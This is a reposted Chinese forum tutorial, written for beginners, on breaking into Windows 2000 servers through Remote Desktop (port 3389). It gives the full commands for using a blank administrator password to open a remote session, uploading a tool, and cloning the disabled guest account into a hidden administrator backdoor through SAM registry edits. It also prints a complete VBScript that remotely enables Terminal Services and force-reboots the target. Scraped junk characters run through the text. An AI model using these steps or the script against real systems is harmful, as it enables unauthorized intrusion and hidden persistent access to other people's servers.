该用户从未签到
|
一次简单的3389入侵过程 , Z+ F3 T1 M, ]' w- x& z' c* h
原创:caozhe(草哲) ) I8 ^; E) d; y5 _
来源:中国欲网技术论坛--草哲
) R3 _3 @* `' i/ T {* I0 }0 x8 I
我在网上看到很多很多教你如何如何入侵之类的文章,我觉得对于菜鸟来说根本是看不懂的!" H+ M# r. s; F: b
( O' L8 k/ N8 W/ l于是呢,我冒出个想法!想写篇简单点的,适合菜鸟的文章!把我学到的跟大家说一下~!- ]' T2 Q7 q2 k! n
要入侵,我建议你在win2000环境下来*作!
; M5 {! u' f* J. n0 O& D3 M6 a9 L3 j: k
首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西!
: |: I* i4 `9 N0 d$ Q$ q扫描的X-Scan V2.3、WINNTAutoAttack、流光!
# |6 G! l5 d. p7 T, q7 XX-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!
* M, h3 a; Z# _! U9 C" \- N远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe)- S& U/ G0 a1 `! g0 e
克隆帐户用个psu就可以了~!
% h9 m9 \+ N0 G& q( }( S+ J7 K1 @7 s% I# o! k3 Q) m
OK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空
' T# D- l2 u1 h, Z$ M. u }" p+ M, I运行CMD(2000下的DOS),我们给它开终端!; q3 ^3 f5 x5 @! y4 _( P
命令如下!
" h5 e! Q. C& p- l7 }cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr9 `( Y3 ]3 B- p1 p6 t6 E
上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启). B4 {! N' n4 z6 w
7 h; p+ O; M$ H因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!" K4 K) l# n, y/ k% K+ S/ `, r7 K7 [
' |, s4 m5 |. z9 n% h. x0 t4 ]一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t
+ p" ~8 `! K! R Q3 V安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!" G* y. r/ E: V) b% X. `
- D8 c* v. N/ r& Z# h2 C回到DOS下!我们建立IPC$连接!
: B( Z" a' D1 |, E3 ^+ Snet use \\120.0.0.1\ipc$ "" /user:"administrator"
4 H* m. N, @8 a这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!
' q! ?+ N' P0 c9 B7 J0 ?0 ~copy psu.exe \\120.0.0.1\admin$\system32
0 g; L n, {. n& Z E6 ~4 e上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
- _8 t; U5 w K
' \2 b' `, U5 Z& ~) K( S假设guest用户被禁用,我们就是要利用guest做后门帐户!) \" n2 L& H* s2 g) Q8 B4 `+ a) Y
在该服务器运行CMD,在命令行下输入
6 W( U8 {) \; [9 o( rpsu -p regedit -i PID1 |2 y# _ V' F
- p) l R2 x* _这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器!% s: A5 N/ T7 }
看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458
& r4 U) k# S3 u- o! t5 k8 A% x那么,命令就是这样2 U( T6 D0 m& D
psu -p regedit -i 5458
% K- @% z) h1 m/ q5 h& ?# J+ k7 b这样直接打开注册表,可以读取本地sam的信息。) J! P& Z1 ~9 L3 [! |3 r6 C
打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users8 j3 ~: K7 H/ J. ~- V% U* O6 c
下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户!9 c% y' c8 O* Q4 |) w9 ~
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
I8 E8 d% `3 i' e查看administrator的类型,是if4,再看guest的是if5
" I& [0 W1 i/ s) X; c% D4 Q好了,知道了类型后,打开1 }/ a4 Z4 F8 k$ f
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4% ~ Q' G, u* Y3 I
这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开( ]. O7 H4 U" ]. e
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
& s; Y0 C; P$ C0 e; s$ M+ [双击右侧的F,把刚复制的粘贴到里面!% J: G6 C% a, X' u9 U2 m) n
0 Y# w$ T s# c
做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5: n+ \3 r- U& C" h/ g# O
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest' @' v' t" w) h9 j% n
这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。 j/ y: ]3 j4 x
, E6 T# X a* C- O3 J$ X
打开CMD,在命令行下输入' Q, y( D- C6 c8 z. @) L4 n
net user guest password
- y! d9 X$ K! X# ?) I# N3 Y, g这条命令是给guest设置密码,后面的password就是密码: y6 Z p: C2 p, Y
然后输入7 T q# s1 D6 F/ G8 v
net user guest /active:y
" H9 b3 F- z" u" v这命令是激活guest帐户,然后我们把他禁用& Z3 Z. D$ z( y4 G
net user guest /active:n/ k; y( z& b" ]
上面的三行命令必须在DOS下执行!
+ [) \: e& k& @& S8 B, f! ]) G4 N( M# [
OK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了!- ^1 ^4 a+ C5 h A6 F" M
而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的!
. K G& }4 O: b A9 L k. o \9 p6 X ^9 ^" E' L
注销一下,用guest登陆吧!
! ?7 N0 V1 g: @- s9 ~% R: r9 @% V# v* _) K; c2 b
打字都打累了~`!真不容易!呵呵~`希望上面的大家能看懂啊!
7 ]; ^/ z# c* U7 Y3 b% [0 N: K p如果还有地方不明白的话,可以问我,我知道的一定告诉大家!
. U$ `: o# i. I; r% c
+ ^6 w3 Z. }, G因为本人也是菜鸟级的,会了点东西就不知道怎么好了,呵呵~`!如果哪里有不对的,还请高手指点啊~!) v; O9 |3 s: [- H1 \/ Y
: @! h9 V) ^0 E) [
----------------------------------------------------------------------
- |' B: S a' g6 K' m+ U以下是开终端的脚本,把它存为*.vbe
/ w( j" L$ z* ?( I/ E% ~1 _on error resume next
8 Y8 n( ~1 D% n: @, e( F( g3 _set outstreem=wscript.stdout2 q( s( D8 n* m/ [$ d! Z
set instreem=wscript.stdin
9 x' F+ v8 v2 n/ uif (lcase(right(wscript.fullname,11))="wscript.exe") then9 s z8 ]) T4 ?; e" S6 g9 s
set objShell=wscript.createObject("wscript.shell"); M: {0 u# R. ~( U- I" l
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))3 R9 y! A4 y8 Z8 S' Y3 C; ~5 \* V
wscript.quit
! D- ]* T/ ]0 t8 Lend if$ g! |% m: ^7 j1 j% Y7 e; r
if wscript.arguments.count<3 then
: t% M# } V2 {6 s5 h9 ` usage()# `2 W+ R! E$ j T% T# A4 q, T5 [
wscript.echo "Not enough parameters."4 X% X( P* P) a( i+ B
wscript.quit
; m5 |5 ]) e: _+ @$ ]3 iend if: I4 q' e! L' W) W+ _: o1 h0 ]
: {/ o, G9 S1 d3 i/ g5 [# Yipaddress=wscript.arguments(0)
1 ]& g' E' D1 y+ X$ k0 I2 W% _2 x6 Kusername=wscript.arguments(1)7 e# W$ d; }* a. T# A$ G
password=wscript.arguments(2)
$ P. ]( ~& N# f4 \( m) ]9 `: fif wscript.arguments.count>3 then
! ]1 |+ D& b; s2 \+ { port=wscript.arguments(3)
' w9 V) J. G- |" G( }; T, telse
% n8 a, ]9 ~1 R% G$ _% C4 G port=33896 d* l. e: O4 A% ~/ L; o( u' t
end if* Y$ B- w( p( e: U
if not isnumeric(port) or port<1 or port>65000 then) ^7 D, r, m, K5 x9 G1 P
wscript.echo "The number of port is error."8 A% g) ^7 X9 b
wscript.quit
- F9 H- g8 Y; z, r9 i3 `end if2 `) y$ `, H1 r9 U8 s
if wscript.arguments.count>4 then8 p, {( i1 W5 F, W
reboot=wscript.arguments(4)
! C9 J7 Z( t- L2 a% Q6 n$ [& |else
0 H1 T0 \- P1 ~4 M% ~. I reboot=""
# w9 ^- e# L* J. s2 W: lend if
' B5 j f5 |. _7 j& `% e/ y/ G f) r# C- i
usage()
$ L1 w; O" c' r1 F) L$ c' eoutstreem.write "Conneting "&ipaddress&" ....") A6 b- y/ G% ?. ]( \& S
set objlocator=createobject("wbemscripting.swbemlocator")( w, c4 d' N6 P n) @9 F
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)* p6 @6 c( J& B& L3 T
showerror(err.number)
7 A! K7 U+ k2 e5 Q' qobjswbemservices.security_.privileges.add 23,true! z# U, ?9 ]* K" h2 ?
objswbemservices.security_.privileges.add 18,true5 R1 \$ c) E9 H( ]' j
5 \9 ^+ }: I& R
outstreem.write "Checking OS type...."
7 r7 h$ A0 a! Oset colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")5 c- F X$ I7 v8 w6 e. A
for each objinstoscaption in colinstoscaption# V% ~- t4 [& r( E a3 ~" v% G6 I
if instr(objinstoscaption.caption,"Server")>0 then
7 N0 B( {' j3 V) F+ ^* ?9 ~ wscript.echo "OK!"
& Y; S i% K; l2 Y5 I* I else2 \& Q+ P' e# R7 `6 s
wscript.echo "OS type is "&objinstoscaption.caption
* s) }* a! g+ g7 b8 D, W outstreem.write "Do you want to cancel setup?[y/n]"
1 S& e, \* ^% B7 Q) _. l strcancel=instreem.readline4 x/ G/ ]! m+ {7 G" o7 F& \) w/ s. ]
if lcase(strcancel)<>"n" then wscript.quit
1 G% S% S9 q' s" X( E8 I4 R6 m% J end if' k" A0 d6 ?7 Q$ v
next
, C; Q6 f0 w/ o! K7 e V" p t |$ s5 ?7 G2 O
outstreem.write "Writing into registry ...."7 d8 \6 r. I. g
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")7 T" K7 b7 K, P/ w
HKLM=&h80000002
/ g) ^0 C3 o& ]& B6 h3 U$ ^7 d# `HKU=&h80000003, P" f7 F9 e% l& m5 M" I% ~$ B
with objinstreg
9 a! C# z* ]2 t- z: X.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache". i$ p* ~' Q, [- t$ o" ?
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0) f# L. F! j T
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
$ s9 w- l* X+ F7 _: J3 }" Z.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",17 l/ B$ B; Y4 ~
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1' t5 ~6 r- R$ e4 Z. B9 T4 z$ p
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2! B3 ^1 i5 I* ^: F: V
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
4 d6 w) E- B; F: ^# g- \6 U.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
6 {/ ^8 ]& j# O5 c.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port) `% J5 {. _: v) t/ Z, z
end with
; _3 I0 z& R7 U7 Z! `+ `7 m1 @6 cshowerror(err.number) Z+ P2 u+ D* l/ { d0 c/ h4 i- C0 \. r
* j# y- |$ D1 B2 R9 b; Orebt=lcase(reboot)& \5 q3 i2 m6 l% x! P+ A# N& w
flag=00 E+ _0 v, [7 e0 T5 ?5 W; u# H
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2/ G; ^6 d% _6 h. i" I3 D: O
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6- y& G! E1 O; T! D) K, v/ x. R
if flag<>0 then) p3 g2 f9 k* D6 r% M u
outstreem.write "Now, reboot target...."
8 z8 s" ~0 B# b6 A strwqlquery="select * from win32_operatingsystem where primary='true'"
- i3 ~" d& D2 }4 ?1 _9 a set colinstances=objswbemservices.execquery(strwqlquery)
9 ~" E+ u0 h0 y) ~& c# K4 B% I1 | for each objinstance in colinstances2 i& a% K& f& ~9 ^. Q
objinstance.win32shutdown(flag): x$ C# i( h J. H5 r5 O/ D- O4 w3 [
next
& p" D/ ~/ Q9 i showerror(err.number)
- Q. w+ ]4 z' T8 y: f/ `else
, o9 C! g' e' }# r: m, k# V2 q4 v: b wscript.echo "You need to reboot target."&vbcrlf&"Then,"
" S5 c, z' v5 B9 }7 Q$ y4 dend if2 S: o e/ i% I
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"
; B! z) {3 Y* B$ v( V' ?2 p9 c" ?; y. ?0 o; d
function showerror(errornumber)
5 c* d4 S5 P& x1 Sif errornumber Then! ~# N, M+ f0 [6 R9 p. w: b+ u
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
6 U' E& |! i) w! ^/ O- m if err.description <> "" then
8 Q3 Y+ Y2 _1 B0 U% [; S wscript.echo "Error description: "&err.description&"."
' e/ J( @) ]- ^: _3 J end if
# J# W) x. E! {4 Y/ R wscript.quit
4 ^" t1 X3 P; ]/ y3 s: Pelse& n& E& d3 W7 |6 L. G
wscript.echo "OK!"/ }& G; s3 O- E' j9 @7 x* A, \
end if& ], K: u2 X8 d
end function) E3 {! `" Y5 P' a; F# y* T2 o
- P1 T/ E) _' n$ Xfunction usage()
! p5 j% e0 P& v' Q# V0 \7 |- z, |wscript.echo string(79,"*")
1 I' ^% o; T; L" Bwscript.echo "ROTS v1.05"
0 x4 }0 p! N4 c v/ Twscript.echo "Remote Open Terminal services Script, by 草哲"
5 L" `* `- X+ v- J9 R; B: |wscript.echo "Welcome to visite www.5458.net"
% V1 l; J1 U* }0 H7 Z5 Y( Qwscript.echo "Usage:"
0 r6 U; }7 B, \: Bwscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"1 W/ _: ]+ P ]2 K
wscript.echo "port: default number is 3389."
4 B9 z# m: G4 \ U; T" S% Twscript.echo "/r: auto reboot target."
; |2 z3 M+ v& g2 D# Z, }wscript.echo "/fr: auto force reboot target.": h- ~7 U" R8 y2 N% s
wscript.echo string(79,"*")&vbcrlf
7 w1 i' K3 C' k y$ _- R% ?end function
7 }" {9 u; S# c9 c 6 b. o& k7 |3 O+ z1 V3 W% p. J- S
转自安全焦点 |
|